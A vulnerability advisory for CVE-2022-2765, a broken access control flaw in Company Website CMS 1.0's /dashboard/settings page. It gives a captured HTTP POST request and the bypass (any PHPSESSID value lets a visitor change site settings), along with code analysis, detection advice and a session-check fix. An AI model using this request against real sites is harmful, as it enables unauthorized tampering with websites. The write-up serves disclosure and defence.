Company Website CMS Unauthorized Website Tampering Vulnerability (CVE-2022-2765)
*I. Vulnerability Overview*
*1.1 Summary*
·Vulnerability name: Company Website CMS unauthorized website tampering vulnerability
·Vulnerability ID: CVE-2022-2765
·Vulnerability type: unauthorized modification (broken access control)
·Severity: Critical
·Affected versions: Company Website CMS 1.0
·Exploitation conditions: default configuration
*1.2 Component Description*
Company Website CMS is a company website/CMS written by the individual developer Torrahclef.
*1.3 Vulnerability Description*
Company Website CMS 1.0 contains a broken access control vulnerability. The flaw lies in unknown functionality of the file /dashboard/settings and results in improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
*II. Vulnerability Reproduction*
*2.1 Application Protocol*
http
*2.2 Environment Setup*
1. Download the source code locally: https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code
2. Create the database in the local phpMyAdmin beforehand
3. Configure the z_db.php file
4. Open the site in a browser
*2.3 Reproduction*
1. The vulnerable endpoint is: Company Website CMS/dashboard/settings
2. To reproduce the unauthorized access, first log in as the admin user and capture the request body for this function
POST /Company%20Website%20CMS/dashboard/settings HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33605517253375376845672324753
Content-Length: 1638
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Company%20Website%20CMS/dashboard/settings
Cookie:PHPSESSID=gbkblf3q6p9q80kqfdvks2ofs6
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_title"
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_keyword"
Church, Marketing
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_desc"
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Impedit nihil tenetur minus quidem est deserunt molestias accusamus harum ullam tempore debitis et, expedita, repellat delectus aspernatur neque itaque qui quod.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_about"
Young coders can use events to coordinate timing and communication between different sprites or pieces of their story. For instance, the when _ key pressed block is an event that starts code whenever the corresponding key on the keyboard is pressed.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_footer"
© 2022 All Rights Reserved
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="follow_text"
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Impedit nihil tenetur minus quidem est deserunt molestias.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_url"
http://localhost:8080/vogue/
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="save"
-----------------------------33605517253375376845672324753--
3. Log out of the admin user, enter the frontend as an ordinary visitor, and the settings can be changed by setting the PHPSESSID field of the cookie to any arbitrary value
*III. Vulnerability Analysis*
*3.1 Technical Background*
*3.2 Code Analysis*
When the site-setting configuration is changed, the user's cookie is not validated, so a request with any PHPSESSID can modify it
<?php
// Excerpt from the settings handler: the POST is processed as soon as
// $_POST['save'] is present, with no session or role check before it.
// $con is the mysqli connection created by z_db.php.
$status = "OK"; // initial status
$msg = "";
if (isset($_POST['save'])) {
    $site_keyword = mysqli_real_escape_string($con, $_POST['site_keyword']);
    $site_desc    = mysqli_real_escape_string($con, $_POST['site_desc']);
    $site_title   = mysqli_real_escape_string($con, $_POST['site_title']);
    $site_about   = mysqli_real_escape_string($con, $_POST['site_about']);
    $site_footer  = mysqli_real_escape_string($con, $_POST['site_footer']);
    $follow_text  = mysqli_real_escape_string($con, $_POST['follow_text']);
    $site_url     = mysqli_real_escape_string($con, $_POST['site_url']);
    // ... the escaped values are then written to the site settings
    // (the remainder of the file is not shown here)
}
*3.3 Traffic Analysis*
Unlike normal traffic, the attacker forges the cookie value, specifically the PHPSESSID field, to bypass authentication; the forged id is clearly different from a genuine one
A genuine admin PHPSESSID is a random 26-character combination of lowercase letters and digits
*3.4 Bypass Method*
Set an arbitrary PHPSESSID to bypass authentication
*IV. Vulnerability Detection*
*4.1 Component Version Check*
The following versions are affected by this vulnerability: Company Website CMS 1.0
Current highest version: Company Website CMS 1.0
*4.2 Triage Recommendations*
Log into the backend, look at the cookie value, and check whether the cookie in the request follows the format of a genuine one. If it is clearly different, inspect the body of the request to see whether it contains malicious content that affects the site
*V. Mitigation Recommendations*
*5.1 Official Fix*
Not fixed
*5.2 Temporary Mitigation*
Before applying the setting field values, verify that the session identified by the cookie belongs to the admin user
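One way to implement this check, as an added example that is not the project's own code: the settings handler is placed behind a server-side session gate. It assumes that z_db.php provides the mysqli connection $con and that the login handler, after verifying the administrator's password, stores the administrator's id in $_SESSION['admin_id'] (an assumed key name) and calls session_regenerate_id(true).

```php
<?php
// Added example, not code from Company Website CMS.
// Assumptions: z_db.php provides $con; the login handler sets
// $_SESSION['admin_id'] (assumed key) and regenerates the session id.
session_start();

/**
 * True only when the PHPSESSID presented by the client resolves to a
 * server-side session that the login handler marked as an administrator.
 * A forged or expired cookie yields an empty session, so the marker is
 * absent and the request is rejected regardless of the cookie's format.
 */
function is_admin_session(): bool
{
    return isset($_SESSION['admin_id'])
        && ctype_digit((string) $_SESSION['admin_id']);
}

if (!is_admin_session()) {
    // Record the rejected attempt so forged-cookie probes against
    // /dashboard/settings show up in the server log (see section 4.2).
    error_log(sprintf(
        'settings: unauthenticated POST rejected from %s',
        $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    ));
    http_response_code(403);
    exit('Forbidden');
}

// Only an authenticated administrator reaches the original logic below.
$status = "OK";
$msg = "";
if (isset($_POST['save'])) {
    $site_keyword = mysqli_real_escape_string($con, $_POST['site_keyword'] ?? '');
    $site_desc    = mysqli_real_escape_string($con, $_POST['site_desc'] ?? '');
    $site_title   = mysqli_real_escape_string($con, $_POST['site_title'] ?? '');
    $site_about   = mysqli_real_escape_string($con, $_POST['site_about'] ?? '');
    $site_footer  = mysqli_real_escape_string($con, $_POST['site_footer'] ?? '');
    $follow_text  = mysqli_real_escape_string($con, $_POST['follow_text'] ?? '');
    $site_url     = mysqli_real_escape_string($con, $_POST['site_url'] ?? '');
    // ... write the values to the site settings as the original handler does
}
```

Because the decision is made from server-side session state rather than from the cookie's appearance, a PHPSESSID that merely looks like a genuine 26-character id is still rejected unless it was issued at login.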
*VI. References*
Source code download URL: https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code